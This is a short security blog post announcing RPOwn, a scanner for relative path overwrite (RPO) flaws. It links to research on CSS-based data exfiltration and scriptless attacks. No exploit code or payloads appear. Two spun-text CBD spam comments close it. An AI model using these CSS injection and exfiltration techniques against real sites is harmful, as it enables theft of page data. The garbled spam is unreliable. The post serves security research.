Tool for finding RPO vulnerabilities and CSS Exfiltration Techniques
Gareth Heyes (@garetheheyes) discovered a new type of vulnerability which is extremely lethal because it is still relatively unknown and many developers don't know how to validate input to protect against this attack.
It makes it possible to inject CSS code anywhere in the page without having to use <style> tags. In fact, there is no need to use angle braces (< >) nor any HTML tag.
I find it very strange that this vulnerability was disclosed some years ago and it still remains very unpopular.
You can see Gareth's amazing post about his new find in:
http://www.thespanner.co.uk/2014/03/21/rpo/
This vulnerability is also documented in PortSwigger:
https://portswigger.net/research/detecting-and-exploiting-path-relative-stylesheet-import-prssi-vulnerabilities
I decided to write a tool to find these vulnerabilities quickly, because most scanners do not detect RPOs. Burp's scanner does detect it but only in the Professional and Enterprise versions; the free version does not.
You can find the tool in:
http://github.com/tr3w/RPOwn
Here are some resources to very clever research about RPO exploitation:
https://www.mbsd.jp/Whitepaper/rpo.pdf
Soroush Dalili discovered a super clever technique to exploit this vulnerability that greatly increases its attack surface.
https://soroush.me/blog/2015/02/non-root-relative-path-overwrite-rpo-in-iis-and-net-applications/
Since RPO exploitation is mainly done by scriptless attacks, I decided to post some links to amazing resources describing different methods of performing scriptless attacks:
@sirdarckcat's attribute reader:
http://eaea.sirdarckcat.net/cssar/v2/
@kinugawamasato text node reader:
https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html
@SecurityMB font ligatures:
https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/
@SecurityMB Data exfiltration in Firefox via single injection point:
https://research.securitum.com/css-data-exfiltration-in-firefox-via-single-injection-point/#:~:text=Firefox%20and%20stylesheet%20processing
Pepe Vila recursive imports technique:
https://gist.github.com/cgvwzq/6260f0f0a47c009c87b4d46ce3808231
@d0nutptr recursive import exfiltration tool:
https://github.com/d0nutptr/sic
Mario Heiderich presentation on scriptless attacks:
https://www.slideshare.net/x00mario/stealing-the-pie
2 thoughts on “Tool for finding RPO vulnerabilities and CSS Exfiltration Techniques”
Leave a Reply Cancel reply
Filed under: Hacking,Web Application Security - @ 2023-08-13 19:06
Tags: gareth, heyes, relative path overwrite, rpo, tool
I've been deep down impressed with CBD gummies and like https://www.cornbreadhemp.com/pages/can-thc-gummies-be-consumed-by-individuals-with-certain-dietary-restrictions . They're not no greater than delicious but also incredibly available in return getting a commonplace administer of CBD. I love how cautious they are, making them immaculate for when I'm on the go. I've from where one stands noticed they steal me relax and have a zizz mastery, unusually after a stressful day. The steadfast dosage in each gummy also takes the guesswork out of managing how much CBD I'm consuming. If you're philosophical of tough CBD, gummies are a consequential choice—legitimate be positive to buy from a trusted label repayment for the upper crust results!
I've been deep down impressed with CBD gummies and like cbd oil with thc for sale. They're not no greater than enjoyable but also incredibly nearby in return getting a everyday measure of CBD. I love how heedful they are, making them perfect for when I'm on the go. I've ourselves noticed they assistants me rest and snooze well-advised, extraordinarily after a stressful day. The unchanging dosage in each gummy also takes the guesswork minus of managing how much CBD I'm consuming. If you're thinking of trying CBD, gummies are a large opportunity—legitimate be sure to steal from a trusted brand looking for the best results!